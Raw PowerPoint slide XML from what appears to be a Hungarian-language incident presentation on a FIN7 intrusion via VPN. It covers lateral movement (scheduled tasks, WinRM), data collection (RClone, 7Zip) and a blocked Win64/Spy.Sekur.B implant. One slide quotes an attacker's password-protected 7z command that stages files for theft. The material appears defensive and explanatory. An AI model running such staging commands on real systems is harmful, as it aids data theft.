              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" err="1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ssw</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0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-v1g -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" err="1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mmt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0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=1 -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" err="1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mhe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0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=on -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" err="1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pPASSWORD</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0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–</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" err="1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spf</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0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c:\windows\temp\file2.7z @c:\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" err="1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programdata</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0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\intel\Logs\file2.txt</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp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AA635E22-DE96-4CAB-17EB-148ABBD6D33A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914399" y="4335931"/>
            <a:ext cx="7225721" cy="5400475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="135860" tIns="67930" rIns="135860" bIns="67930" numCol="1" spcCol="540000" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="152408" indent="-152408" algn="l" defTabSz="609630" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="12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1467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23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 smtClean="0"/>
              <a:t>Later</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>ális</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4800" dirty="0" smtClean="0"/>
              <a:t> mozgás</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-260408">
              <a:buClr>
                <a:srgbClr val="00BBC5"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ütemezett feladat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-260408">
              <a:buClr>
                <a:srgbClr val="00BBC5"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WinRM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="4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hu-HU" sz="4800" dirty="0" smtClean="0"/>
              <a:t>Adatgyűjtés</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-260408">
              <a:buClr>
                <a:srgbClr val="00BBC5"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RClone</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-260408">
              <a:buClr>
                <a:srgbClr val="00BBC5"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7Zip</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2180" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="90110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C6302-13EF-1442-506A-BDEB4AF1E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Gradient TEAL" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59B27516-9DA7-ACFD-E9FB-6FD09105FD4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144721" y="-5037820"/>
            <a:ext cx="30087414" cy="18514850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="!!Gradient PURPLE" descr="A purple line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEC9C7F8-F68C-049B-5BBC-2E2700D0607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849229" y="1284780"/>
            <a:ext cx="30560502" cy="18285230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="!!Gradient TEAL 2" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46E9E2C6-F828-AE80-25E0-5893034089B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220222" y="-16963399"/>
            <a:ext cx="42906647" cy="26403406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!Gradient CRIMSON" descr="A red light in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A056D3D-824C-4477-C3C1-F2AFD51134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14407705" y="-5577283"/>
            <a:ext cx="13607400" cy="8690365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!Gradient TEAL Fat" descr="A blue oval with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{239AE732-0912-8526-03E1-3A63D1C089A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-12354021" y="5703318"/>
            <a:ext cx="19335716" cy="13730680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="!!Agenda">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7003CB89-C0AE-F25B-2F10-815627D2AAF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="892285"/>
            <a:ext cx="3234267" cy="838155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="187631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923"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1862" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>VPN – FIN7</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4754" b="1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31" name="Connector: Elbow 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02E3DAA2-6DCB-57C7-47B6-A5B84A81DA0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="62" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="12397814" y="-1846637"/>
            <a:ext cx="1115384" cy="452942"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="424D56"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Rectangle: Rounded Corners 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1897DAC4-026B-9DD7-E6D5-75E3F76E00F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5409791" y="2616373"/>
            <a:ext cx="7541443" cy="1917104"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12415"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect t="-23893" r="-7284" b="-248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srgbClr val="525252"/>
              </a:solidFill>
              <a:latin typeface="IntelOne Display Regular"/>
              <a:cs typeface="Arial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21B7B47-B209-FD43-82AC-BBB24F5143FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5745514" y="3321298"/>
            <a:ext cx="4317809" cy="855946"/>
            <a:chOff x="12435194" y="912131"/>
            <a:chExt cx="4317809" cy="855946"/>
          </a:xfrm>
        </p:grpSpPr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E79DF902-8F22-2571-E7AE-E5E01BA0D135}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12435194" y="914400"/>
              <a:ext cx="4317809" cy="853677"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="414D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1B3C5B25-DCE4-E2E9-3766-686F0498A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12505042" y="912131"/>
              <a:ext cx="836659" cy="836659"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB6324FD-BA4D-7F06-B467-981A410D0C90}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13341701" y="914400"/>
              <a:ext cx="3411302" cy="834390"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0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Remote Scheduled Task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6D9A587-6470-F7D5-D4C3-DBE797C9560B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10468894" y="3327226"/>
            <a:ext cx="2190497" cy="853677"/>
            <a:chOff x="12435194" y="914400"/>
            <a:chExt cx="2190497" cy="853677"/>
          </a:xfrm>
          <a:effectLst/>
        </p:grpSpPr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8539DF10-CD2F-A5A6-0336-7F75E1DDA087}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12435194" y="914400"/>
              <a:ext cx="2190497" cy="853677"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4274CC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640871E0-D5E2-B720-5451-09BDB3234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/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="12639457" y="1099964"/>
              <a:ext cx="608996" cy="456747"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFAD2AC0-0076-30CD-6E49-8DABBCB2464A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13341701" y="914400"/>
              <a:ext cx="1237851" cy="834390"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" err="1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WinRM</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/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8D303CA7-A742-39B9-120D-59E38A9189B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13181977" y="-1489313"/>
            <a:ext cx="7872833" cy="853677"/>
            <a:chOff x="11179244" y="6339909"/>
            <a:chExt cx="7872833" cy="853677"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="Rounded Rectangle 61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{005326EE-4669-B92E-8EE0-87B45D32446A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11179244" y="6339909"/>
              <a:ext cx="7872833" cy="853677"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EA860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63" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9738BB60-06BC-E0FF-4564-678810AF420A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12085750" y="6339909"/>
              <a:ext cx="6966327" cy="834390"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0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Win64/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0" err="1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Spy.Sekur.B</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0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Blocked in Memory</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="65" name="Graphic 64">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19A08249-9CB6-5909-73C9-07A6F5D33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11286671" y="6375282"/>
              <a:ext cx="805644" cy="805644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3786726-B661-52D0-F11F-A02C7735E188}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4197456" y="662235"/>
            <a:ext cx="726372" cy="838155"/>
            <a:chOff x="14027225" y="3493572"/>
            <a:chExt cx="1160569" cy="1339172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CC1EE11-12BB-41D7-E661-925E05A1A2F3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14518214" y="3850697"/>
              <a:ext cx="178590" cy="178538"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 178590 w 178590"/>
                <a:gd name="connsiteY0" fmla="*/ 89243 h 178538"/>
                <a:gd name="connsiteX1" fmla="*/ 89295 w 178590"/>
                <a:gd name="connsiteY1" fmla="*/ 178538 h 178538"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 178590"/>
                <a:gd name="connsiteY2" fmla="*/ 89243 h 178538"/>
                <a:gd name="connsiteX3" fmla="*/ 89295 w 178590"/>
                <a:gd name="connsiteY3" fmla="*/ 0 h 178538"/>
                <a:gd name="connsiteX4" fmla="*/ 178590 w 178590"/>
                <a:gd name="connsiteY4" fmla="*/ 89243 h 178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590" h="178538">
                  <a:moveTo>
                    <a:pt x="178590" y="89243"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="178590" y="138572"/>
                    <a:pt x="138624" y="178538"/>
                    <a:pt x="89295" y="178538"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39966" y="178538"/>
                    <a:pt x="0" y="138572"/>
                    <a:pt x="0" y="89243"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="39966"/>
                    <a:pt x="39966" y="0"/>
                    <a:pt x="89295" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138624" y="0"/>
                    <a:pt x="178590" y="39966"/>
                    <a:pt x="178590" y="89243"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="13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SK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FFA1B86A-5891-603D-E59E-83D5E62EACC7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="14027225" y="3493572"/>
              <a:ext cx="1160569" cy="1339172"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY0" fmla="*/ 267885 h 1339172"/>
                <a:gd name="connsiteX1" fmla="*/ 401748 w 1160569"/>
                <a:gd name="connsiteY1" fmla="*/ 446422 h 1339172"/>
                <a:gd name="connsiteX2" fmla="*/ 535664 w 1160569"/>
                <a:gd name="connsiteY2" fmla="*/ 619147 h 1339172"/>
                <a:gd name="connsiteX3" fmla="*/ 535664 w 1160569"/>
                <a:gd name="connsiteY3" fmla="*/ 982032 h 1339172"/>
                <a:gd name="connsiteX4" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY4" fmla="*/ 1026653 h 1339172"/>
                <a:gd name="connsiteX5" fmla="*/ 714200 w 1160569"/>
                <a:gd name="connsiteY5" fmla="*/ 1026653 h 1339172"/>
                <a:gd name="connsiteX6" fmla="*/ 758821 w 1160569"/>
                <a:gd name="connsiteY6" fmla="*/ 982032 h 1339172"/>
                <a:gd name="connsiteX7" fmla="*/ 714200 w 1160569"/>
                <a:gd name="connsiteY7" fmla="*/ 937411 h 1339172"/>
                <a:gd name="connsiteX8" fmla="*/ 624905 w 1160569"/>
                <a:gd name="connsiteY8" fmla="*/ 937411 h 1339172"/>
                <a:gd name="connsiteX9" fmla="*/ 624905 w 1160569"/>
                <a:gd name="connsiteY9" fmla="*/ 848116 h 1339172"/>
                <a:gd name="connsiteX10" fmla="*/ 714200 w 1160569"/>
                <a:gd name="connsiteY10" fmla="*/ 848116 h 1339172"/>
                <a:gd name="connsiteX11" fmla="*/ 758821 w 1160569"/>
                <a:gd name="connsiteY11" fmla="*/ 803495 h 1339172"/>
                <a:gd name="connsiteX12" fmla="*/ 714200 w 1160569"/>
                <a:gd name="connsiteY12" fmla="*/ 758875 h 1339172"/>
                <a:gd name="connsiteX13" fmla="*/ 624905 w 1160569"/>
                <a:gd name="connsiteY13" fmla="*/ 758875 h 1339172"/>
                <a:gd name="connsiteX14" fmla="*/ 624905 w 1160569"/>
                <a:gd name="connsiteY14" fmla="*/ 619147 h 1339172"/>
                <a:gd name="connsiteX15" fmla="*/ 758821 w 1160569"/>
                <a:gd name="connsiteY15" fmla="*/ 446422 h 1339172"/>
                <a:gd name="connsiteX16" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY16" fmla="*/ 267885 h 1339172"/>
                <a:gd name="connsiteX17" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY17" fmla="*/ 0 h 1339172"/>
                <a:gd name="connsiteX18" fmla="*/ 892737 w 1160569"/>
                <a:gd name="connsiteY18" fmla="*/ 89295 h 1339172"/>
                <a:gd name="connsiteX19" fmla="*/ 1160569 w 1160569"/>
                <a:gd name="connsiteY19" fmla="*/ 133916 h 1339172"/>
                <a:gd name="connsiteX20" fmla="*/ 1160569 w 1160569"/>
                <a:gd name="connsiteY20" fmla="*/ 477112 h 1339172"/>
                <a:gd name="connsiteX21" fmla="*/ 1148262 w 1160569"/>
                <a:gd name="connsiteY21" fmla="*/ 479597 h 1339172"/>
                <a:gd name="connsiteX22" fmla="*/ 1044021 w 1160569"/>
                <a:gd name="connsiteY22" fmla="*/ 636859 h 1339172"/>
                <a:gd name="connsiteX23" fmla="*/ 1054473 w 1160569"/>
                <a:gd name="connsiteY23" fmla="*/ 688631 h 1339172"/>
                <a:gd name="connsiteX24" fmla="*/ 1024168 w 1160569"/>
                <a:gd name="connsiteY24" fmla="*/ 694750 h 1339172"/>
                <a:gd name="connsiteX25" fmla="*/ 919927 w 1160569"/>
                <a:gd name="connsiteY25" fmla="*/ 852012 h 1339172"/>
                <a:gd name="connsiteX26" fmla="*/ 969917 w 1160569"/>
                <a:gd name="connsiteY26" fmla="*/ 972698 h 1339172"/>
                <a:gd name="connsiteX27" fmla="*/ 978998 w 1160569"/>
                <a:gd name="connsiteY27" fmla="*/ 978821 h 1339172"/>
                <a:gd name="connsiteX28" fmla="*/ 977587 w 1160569"/>
                <a:gd name="connsiteY28" fmla="*/ 979106 h 1339172"/>
                <a:gd name="connsiteX29" fmla="*/ 873346 w 1160569"/>
                <a:gd name="connsiteY29" fmla="*/ 1136368 h 1339172"/>
                <a:gd name="connsiteX30" fmla="*/ 880413 w 1160569"/>
                <a:gd name="connsiteY30" fmla="*/ 1171373 h 1339172"/>
                <a:gd name="connsiteX31" fmla="*/ 811434 w 1160569"/>
                <a:gd name="connsiteY31" fmla="*/ 1223714 h 1339172"/>
                <a:gd name="connsiteX32" fmla="*/ 714200 w 1160569"/>
                <a:gd name="connsiteY32" fmla="*/ 1277544 h 1339172"/>
                <a:gd name="connsiteX33" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY33" fmla="*/ 1339172 h 1339172"/>
                <a:gd name="connsiteX34" fmla="*/ 446368 w 1160569"/>
                <a:gd name="connsiteY34" fmla="*/ 1277544 h 1339172"/>
                <a:gd name="connsiteX35" fmla="*/ 0 w 1160569"/>
                <a:gd name="connsiteY35" fmla="*/ 579401 h 1339172"/>
                <a:gd name="connsiteX36" fmla="*/ 0 w 1160569"/>
                <a:gd name="connsiteY36" fmla="*/ 133916 h 1339172"/>
                <a:gd name="connsiteX37" fmla="*/ 267832 w 1160569"/>
                <a:gd name="connsiteY37" fmla="*/ 89295 h 1339172"/>
                <a:gd name="connsiteX38" fmla="*/ 580284 w 1160569"/>
                <a:gd name="connsiteY38" fmla="*/ 0 h 1339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160569" h="1339172">
                  <a:moveTo>
                    <a:pt x="580284" y="267885"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="481679" y="267885"/>
                    <a:pt x="401748" y="347764"/>
                    <a:pt x="401748" y="446422"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="401748" y="529434"/>
                    <a:pt x="458453" y="599531"/>
                    <a:pt x="535664" y="619147"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="535664" y="982032"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="535664" y="1006566"/>
                    <a:pt x="555751" y="1026653"/>
                    <a:pt x="580284" y="1026653"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="714200" y="1026653"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="738734" y="1026653"/>
                    <a:pt x="758821" y="1006566"/>
                    <a:pt x="758821" y="982032"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="758821" y="957499"/>
                    <a:pt x="738734" y="937411"/>
                    <a:pt x="714200" y="937411"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="624905" y="937411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624905" y="848116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="714200" y="848116"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="738734" y="848116"/>
                    <a:pt x="758821" y="828029"/>
                    <a:pt x="758821" y="803495"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="758821" y="778962"/>
                    <a:pt x="738734" y="758875"/>
                    <a:pt x="714200" y="758875"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="624905" y="758875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624905" y="619147"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="702116" y="599542"/>
                    <a:pt x="758821" y="529439"/>
                    <a:pt x="758821" y="446422"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="758821" y="347764"/>
                    <a:pt x="678943" y="267885"/>
                    <a:pt x="580284" y="267885"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="580284" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="671776" y="32590"/>
                    <a:pt x="776241" y="63873"/>
                    <a:pt x="892737" y="89295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="988728" y="110272"/>
                    <a:pt x="1078441" y="124552"/>
                    <a:pt x="1160569" y="133916"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1160569" y="477112"/>
                  </a:lnTo>
                  <a:lnTo>
